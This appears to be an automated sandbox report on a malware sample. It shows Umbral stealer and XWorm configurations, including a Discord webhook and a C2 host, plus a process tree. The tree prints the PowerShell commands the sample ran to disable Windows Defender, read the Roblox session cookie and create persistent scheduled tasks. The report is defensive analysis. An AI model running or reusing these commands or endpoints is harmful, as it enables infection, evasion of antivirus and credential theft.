Analysis
-
max time kernel
149s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
19-05-2024 02:46
Static task
static1
Behavioral task
behavioral1
Sample
aec009724ba208376f91cbfafd60db1e965f9016f17f14bfb3b074dde1f6ae28.exe
Resource
win7-20240221-en
General
-
Target
aec009724ba208376f91cbfafd60db1e965f9016f17f14bfb3b074dde1f6ae28.exe
-
Size
19.8MB
-
MD5
3969991942bb5b6130977411ae258ab8
-
SHA1
c391e670488d73dc79c2acfab1e845d9c3e5227e
-
SHA256
aec009724ba208376f91cbfafd60db1e965f9016f17f14bfb3b074dde1f6ae28
-
SHA512
ce009d113cd85629cb744c0e30fecc9cb1f3bc353b546eab676604a3eec976c5f0dc60cb29b7f4841bb71bb7596128340d1b222408c9aeeb9f9671d1a1add00a
-
SSDEEP
393216:O581WtclJGQ9GnlC58mn3yJQjNKlgtcTuOYTmWYlY5nGPEy+tj7NJX:OeWgdGnlCqm3vKCTmpY5Py+r
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1221847080373584144/7stbODqa-C2IH_V1s7-AaD6fECqR68YLov_s341xewFGvFGlgl7fRFcAsV3CtRNlSgzQ
Extracted
xworm
127.0.0.1:30683
operating-niger.gl.at.ply.gg:30683:30683
-
Install_directory
%AppData%
-
install_file
XClient.exe
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral2/files/0x00070000000234a5-27.dat family_umbral behavioral2/memory/4528-29-0x000001B22E170000-0x000001B22E1B0000-memory.dmp family_umbral -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x00070000000234ac-58.dat family_xworm behavioral2/memory/3564-60-0x0000000000550000-0x0000000000566000-memory.dmp family_xworm -
Process spawned unexpected child process 48 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2532 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4464 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4112 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2364 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 656 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2256 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1396 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4400 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2248 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3716 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2360 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4040 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3860 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1940 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3732 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5024 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3568 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2324 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4520 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1212 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5096 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4696 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 744 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3520 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4952 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2112 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1872 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1144 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3132 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4676 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4144 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5080 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3204 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2360 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4040 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3732 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2020 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3580 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3576 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4844 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1464 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4992 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 936 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2704 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1176 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 368 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2568 4472 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 548 4472 schtasks.exe 91 -
resource yara_rule behavioral2/files/0x00080000000234a0-19.dat dcrat behavioral2/files/0x00070000000234a9-117.dat dcrat behavioral2/memory/3828-118-0x0000000000BB0000-0x0000000000C86000-memory.dmp dcrat -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1796 powershell.exe 8 powershell.exe 428 powershell.exe 2108 powershell.exe 5048 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Umbral.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation t.bat Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation Nursultan (17).exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation LoaderMas.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation Chainprovider.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation Chainprovider.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation aec009724ba208376f91cbfafd60db1e965f9016f17f14bfb3b074dde1f6ae28.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk LoaderMas.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk LoaderMas.exe -
Executes dropped EXE 8 IoCs
pid Process 3224 Nursultan (17).exe 964 t.bat 4528 Umbral.exe 3100 Nursultan.exe 3564 LoaderMas.exe 3828 Chainprovider.exe 3116 Chainprovider.exe 1516 LoaderMas.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 26 discord.com 27 discord.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 15 ip-api.com 23 ip-api.com -
Drops file in Program Files directory 12 IoCs
description ioc Process File created C:\Program Files (x86)\Windows Defender\it-IT\sysmon.exe Chainprovider.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\sysmon.exe Chainprovider.exe File created C:\Program Files\Windows Portable Devices\powershell.exe Chainprovider.exe File created C:\Program Files\Windows Portable Devices\e978f868350d50 Chainprovider.exe File created C:\Program Files\Windows Sidebar\RuntimeBroker.exe Chainprovider.exe File created C:\Program Files\Microsoft Office\root\rsod\0a1fd5f707cd16 Chainprovider.exe File created C:\Program Files (x86)\Windows Defender\it-IT\121e5b5079f7c0 Chainprovider.exe File opened for modification C:\Program Files\Windows Sidebar\RuntimeBroker.exe Chainprovider.exe File created C:\Program Files\Windows Sidebar\9e8d7a4ca61bd9 Chainprovider.exe File created C:\Program Files\Windows Sidebar\Shared Gadgets\Umbral.exe Chainprovider.exe File created C:\Program Files\Windows Sidebar\Shared Gadgets\6feec19d54a440 Chainprovider.exe File created C:\Program Files\Microsoft Office\root\rsod\sppsvc.exe Chainprovider.exe -
Drops file in Windows directory 6 IoCs
description ioc Process File created C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Registry.exe Chainprovider.exe File created C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\ee2ad38f3d4382 Chainprovider.exe File created C:\Windows\PrintDialog\Assets\csrss.exe Chainprovider.exe File created C:\Windows\PrintDialog\Assets\886983d96e3d3e Chainprovider.exe File created C:\Windows\ServiceProfiles\wininit.exe Chainprovider.exe File created C:\Windows\ServiceProfiles\56085415360792 Chainprovider.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 48 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1176 schtasks.exe 3860 schtasks.exe 3132 schtasks.exe 4144 schtasks.exe 3204 schtasks.exe 1464 schtasks.exe 4992 schtasks.exe 4844 schtasks.exe 2364 schtasks.exe 656 schtasks.exe 4040 schtasks.exe 744 schtasks.exe 2112 schtasks.exe 3732 schtasks.exe 3580 schtasks.exe 936 schtasks.exe 2532 schtasks.exe 4400 schtasks.exe 2360 schtasks.exe 1144 schtasks.exe 4040 schtasks.exe 2020 schtasks.exe 3576 schtasks.exe 4112 schtasks.exe 2248 schtasks.exe 3568 schtasks.exe 1212 schtasks.exe 3520 schtasks.exe 5080 schtasks.exe 5096 schtasks.exe 3732 schtasks.exe 5024 schtasks.exe 2324 schtasks.exe 4520 schtasks.exe 4696 schtasks.exe 1872 schtasks.exe 1396 schtasks.exe 1940 schtasks.exe 4952 schtasks.exe 4676 schtasks.exe 2360 schtasks.exe 548 schtasks.exe 4464 schtasks.exe 2256 schtasks.exe 3716 schtasks.exe 2704 schtasks.exe 368 schtasks.exe 2568 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1780 wmic.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings t.bat Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings Chainprovider.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 936 PING.EXE -
Suspicious behavior: EnumeratesProcesses 36 IoCs
pid Process 4528 Umbral.exe 1796 powershell.exe 1796 powershell.exe 4992 powershell.exe 4992 powershell.exe 4908 powershell.exe 4908 powershell.exe 4908 powershell.exe 3828 Chainprovider.exe 3828 Chainprovider.exe 3100 Nursultan.exe 3100 Nursultan.exe 8 powershell.exe 8 powershell.exe 740 powershell.exe 740 powershell.exe 740 powershell.exe 3116 Chainprovider.exe 3116 Chainprovider.exe 8 powershell.exe 428 powershell.exe 428 powershell.exe 428 powershell.exe 1668 powershell.exe 1668 powershell.exe 2108 powershell.exe 2108 powershell.exe 2108 powershell.exe 1668 powershell.exe 5048 powershell.exe 5048 powershell.exe 5048 powershell.exe 3564 LoaderMas.exe 3564 LoaderMas.exe 1516 LoaderMas.exe 1516 LoaderMas.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4528 Umbral.exe Token: SeIncreaseQuotaPrivilege 1328 wmic.exe Token: SeSecurityPrivilege 1328 wmic.exe Token: SeTakeOwnershipPrivilege 1328 wmic.exe Token: SeLoadDriverPrivilege 1328 wmic.exe Token: SeSystemProfilePrivilege 1328 wmic.exe Token: SeSystemtimePrivilege 1328 wmic.exe Token: SeProfSingleProcessPrivilege 1328 wmic.exe Token: SeIncBasePriorityPrivilege 1328 wmic.exe Token: SeCreatePagefilePrivilege 1328 wmic.exe Token: SeBackupPrivilege 1328 wmic.exe Token: SeRestorePrivilege 1328 wmic.exe Token: SeShutdownPrivilege 1328 wmic.exe Token: SeDebugPrivilege 1328 wmic.exe Token: SeSystemEnvironmentPrivilege 1328 wmic.exe Token: SeRemoteShutdownPrivilege 1328 wmic.exe Token: SeUndockPrivilege 1328 wmic.exe Token: SeManageVolumePrivilege 1328 wmic.exe Token: 33 1328 wmic.exe Token: 34 1328 wmic.exe Token: 35 1328 wmic.exe Token: 36 1328 wmic.exe Token: SeIncreaseQuotaPrivilege 1328 wmic.exe Token: SeSecurityPrivilege 1328 wmic.exe Token: SeTakeOwnershipPrivilege 1328 wmic.exe Token: SeLoadDriverPrivilege 1328 wmic.exe Token: SeSystemProfilePrivilege 1328 wmic.exe Token: SeSystemtimePrivilege 1328 wmic.exe Token: SeProfSingleProcessPrivilege 1328 wmic.exe Token: SeIncBasePriorityPrivilege 1328 wmic.exe Token: SeCreatePagefilePrivilege 1328 wmic.exe Token: SeBackupPrivilege 1328 wmic.exe Token: SeRestorePrivilege 1328 wmic.exe Token: SeShutdownPrivilege 1328 wmic.exe Token: SeDebugPrivilege 1328 wmic.exe Token: SeSystemEnvironmentPrivilege 1328 wmic.exe Token: SeRemoteShutdownPrivilege 1328 wmic.exe Token: SeUndockPrivilege 1328 wmic.exe Token: SeManageVolumePrivilege 1328 wmic.exe Token: 33 1328 wmic.exe Token: 34 1328 wmic.exe Token: 35 1328 wmic.exe Token: 36 1328 wmic.exe Token: SeDebugPrivilege 3564 LoaderMas.exe Token: SeDebugPrivilege 1796 powershell.exe Token: SeDebugPrivilege 4992 powershell.exe Token: SeDebugPrivilege 4908 powershell.exe Token: SeDebugPrivilege 3828 Chainprovider.exe Token: SeDebugPrivilege 8 powershell.exe Token: SeDebugPrivilege 740 powershell.exe Token: SeDebugPrivilege 3116 Chainprovider.exe Token: SeDebugPrivilege 428 powershell.exe Token: SeIncreaseQuotaPrivilege 4664 wmic.exe Token: SeSecurityPrivilege 4664 wmic.exe Token: SeTakeOwnershipPrivilege 4664 wmic.exe Token: SeLoadDriverPrivilege 4664 wmic.exe Token: SeSystemProfilePrivilege 4664 wmic.exe Token: SeSystemtimePrivilege 4664 wmic.exe Token: SeProfSingleProcessPrivilege 4664 wmic.exe Token: SeIncBasePriorityPrivilege 4664 wmic.exe Token: SeCreatePagefilePrivilege 4664 wmic.exe Token: SeBackupPrivilege 4664 wmic.exe Token: SeRestorePrivilege 4664 wmic.exe Token: SeShutdownPrivilege 4664 wmic.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3564 LoaderMas.exe -
Suspicious use of WriteProcessMemory 61 IoCs
description pid Process procid_target PID 4492 wrote to memory of 3224 4492 aec009724ba208376f91cbfafd60db1e965f9016f17f14bfb3b074dde1f6ae28.exe 85 PID 4492 wrote to memory of 3224 4492 aec009724ba208376f91cbfafd60db1e965f9016f17f14bfb3b074dde1f6ae28.exe 85 PID 4492 wrote to memory of 964 4492 aec009724ba208376f91cbfafd60db1e965f9016f17f14bfb3b074dde1f6ae28.exe 86 PID 4492 wrote to memory of 964 4492 aec009724ba208376f91cbfafd60db1e965f9016f17f14bfb3b074dde1f6ae28.exe 86 PID 4492 wrote to memory of 964 4492 aec009724ba208376f91cbfafd60db1e965f9016f17f14bfb3b074dde1f6ae28.exe 86 PID 4492 wrote to memory of 4528 4492 aec009724ba208376f91cbfafd60db1e965f9016f17f14bfb3b074dde1f6ae28.exe 87 PID 4492 wrote to memory of 4528 4492 aec009724ba208376f91cbfafd60db1e965f9016f17f14bfb3b074dde1f6ae28.exe 87 PID 964 wrote to memory of 4744 964 t.bat 88 PID 964 wrote to memory of 4744 964 t.bat 88 PID 964 wrote to memory of 4744 964 t.bat 88 PID 4528 wrote to memory of 1328 4528 Umbral.exe 181 PID 4528 wrote to memory of 1328 4528 Umbral.exe 181 PID 3224 wrote to memory of 3100 3224 Nursultan (17).exe 93 PID 3224 wrote to memory of 3100 3224 Nursultan (17).exe 93 PID 3224 wrote to memory of 3564 3224 Nursultan (17).exe 95 PID 3224 wrote to memory of 3564 3224 Nursultan (17).exe 95 PID 4528 wrote to memory of 1384 4528 Umbral.exe 96 PID 4528 wrote to memory of 1384 4528 Umbral.exe 96 PID 4528 wrote to memory of 1796 4528 Umbral.exe 98 PID 4528 wrote to memory of 1796 4528 Umbral.exe 98 PID 4528 wrote to memory of 4992 4528 Umbral.exe 161 PID 4528 wrote to memory of 4992 4528 Umbral.exe 161 PID 4528 wrote to memory of 4908 4528 Umbral.exe 104 PID 4528 wrote to memory of 4908 4528 Umbral.exe 104 PID 4744 wrote to memory of 4912 4744 WScript.exe 106 PID 4744 wrote to memory of 4912 4744 WScript.exe 106 PID 4744 wrote to memory of 4912 4744 WScript.exe 106 PID 4912 wrote to memory of 3828 4912 cmd.exe 108 PID 4912 wrote to memory of 3828 4912 cmd.exe 108 PID 3564 wrote to memory of 8 3564 LoaderMas.exe 121 PID 3564 wrote to memory of 8 3564 LoaderMas.exe 121 PID 4528 wrote to memory of 740 4528 Umbral.exe 125 PID 4528 wrote to memory of 740 4528 Umbral.exe 125 PID 3828 wrote to memory of 3116 3828 Chainprovider.exe 128 PID 3828 wrote to memory of 3116 3828 Chainprovider.exe 128 PID 3564 wrote to memory of 428 3564 LoaderMas.exe 141 PID 3564 wrote to memory of 428 3564 LoaderMas.exe 141 PID 4528 wrote to memory of 4664 4528 Umbral.exe 145 PID 4528 wrote to memory of 4664 4528 Umbral.exe 145 PID 4528 wrote to memory of 1356 4528 Umbral.exe 155 PID 4528 wrote to memory of 1356 4528 Umbral.exe 155 PID 4528 wrote to memory of 5024 4528 Umbral.exe 162 PID 4528 wrote to memory of 5024 4528 Umbral.exe 162 PID 4528 wrote to memory of 1668 4528 Umbral.exe 167 PID 4528 wrote to memory of 1668 4528 Umbral.exe 167 PID 3564 wrote to memory of 2108 3564 LoaderMas.exe 169 PID 3564 wrote to memory of 2108 3564 LoaderMas.exe 169 PID 3116 wrote to memory of 1240 3116 Chainprovider.exe 174 PID 3116 wrote to memory of 1240 3116 Chainprovider.exe 174 PID 1240 wrote to memory of 4900 1240 cmd.exe 176 PID 1240 wrote to memory of 4900 1240 cmd.exe 176 PID 4528 wrote to memory of 1780 4528 Umbral.exe 177 PID 4528 wrote to memory of 1780 4528 Umbral.exe 177 PID 3564 wrote to memory of 5048 3564 LoaderMas.exe 180 PID 3564 wrote to memory of 5048 3564 LoaderMas.exe 180 PID 4528 wrote to memory of 1464 4528 Umbral.exe 182 PID 4528 wrote to memory of 1464 4528 Umbral.exe 182 PID 1464 wrote to memory of 936 1464 cmd.exe 184 PID 1464 wrote to memory of 936 1464 cmd.exe 184 PID 1240 wrote to memory of 1516 1240 cmd.exe 187 PID 1240 wrote to memory of 1516 1240 cmd.exe 187 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1384 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\aec009724ba208376f91cbfafd60db1e965f9016f17f14bfb3b074dde1f6ae28.exe"C:\Users\Admin\AppData\Local\Temp\aec009724ba208376f91cbfafd60db1e965f9016f17f14bfb3b074dde1f6ae28.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4492 -
C:\Users\Admin\AppData\Roaming\Nursultan (17).exe"C:\Users\Admin\AppData\Roaming\Nursultan (17).exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3224 -
C:\Users\Admin\AppData\Roaming\Nursultan.exe"C:\Users\Admin\AppData\Roaming\Nursultan.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3100
-
-
C:\Users\Admin\AppData\Roaming\LoaderMas.exe"C:\Users\Admin\AppData\Roaming\LoaderMas.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3564 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\LoaderMas.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:8
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'LoaderMas.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:428
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5048 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:1328
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\t.bat"C:\Users\Admin\AppData\Roaming\t.bat"2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:964 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\perfdhcpSvc\LUps3wjkA6jhdk7xRy8J55z2u.vbe"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4744 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\perfdhcpSvc\mStUjP0ksX5N.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:4912 -
C:\perfdhcpSvc\Chainprovider.exe"C:\perfdhcpSvc\Chainprovider.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3828 -
C:\perfdhcpSvc\Chainprovider.exe"C:\perfdhcpSvc\Chainprovider.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3116 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lEEmdmcqAW.bat"7⤵
- Suspicious use of WriteProcessMemory
PID:1240 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:4900
-
-
C:\Users\Public\LoaderMas.exe"C:\Users\Public\LoaderMas.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1516
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\Umbral.exe"C:\Users\Admin\AppData\Roaming\Umbral.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4528 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1328
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Roaming\Umbral.exe"3⤵
- Views/modifies file attributes
PID:1384
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Umbral.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4992
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4908
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:740
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4664
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:1356
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:5024
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1668
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:1780
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Roaming\Umbral.exe" && pause3⤵
- Suspicious use of WriteProcessMemory
PID:1464 -
C:\Windows\system32\PING.EXEping localhost4⤵
- Runs ping.exe
PID:936
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmons" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Defender\it-IT\sysmon.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2532
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\it-IT\sysmon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4464
-
